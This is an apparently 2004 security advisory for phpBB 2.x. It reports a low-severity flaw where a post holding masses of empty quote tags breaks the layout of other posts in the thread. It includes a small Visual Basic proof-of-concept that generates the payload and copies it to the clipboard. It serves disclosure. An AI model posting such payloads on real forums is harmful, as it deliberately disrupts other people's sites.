A flaw in phpBB 2.x allows a malicious user the ability to alter how posts are aligned due to mishandling of quotes in posts.
70f56094bb313dcfcd45d1f37379dbf6cf24d348bfcc8878251a398c4ba3275d
Affected Software: phpBB 2.x (tested on 2.0.4 and 2.0.8, untested on later versions)
Vulnerability: flaw in code handling the quoting of posts.
Severity: Low
Discovered by: Matt Benenati <darkk88[AT]gmail.com>
+Details+
=========
This flaw could allow a malicious user
to alter the alignment and layout of any posts in the same thread as the exploit post.
The exploit just involves using an absurd amount of blank quotes in a single post.
+Exploit Code+
=============
'phpBB Quote Exploit
'Copyright (C) 2004 by Matt Benenati
'
'text is automaticly copied to the windows clipboard
'user just has to paste the text into a post to execute the exploit
Private Sub Command1_Click()
Dim xptext As String
Dim num1 As Integer, num2 As Integer, num3 As Integer, num4 As Integer
num1% = 0
num2% = 100
num3% = 0
num4% = 100
1: xptext$ = xptext$ & "[quote]"
num1% = num1% + 1
If num1% = num2% Then GoTo 2 Else GoTo 1
2: xptext$ = xptext$ & "[/quote]"
num3% = num3% + 1
If num3% = num4% Then GoTo 3 Else GoTo 2
3: Clipboard.Clear
Clipboard.SetText xptext$
End Sub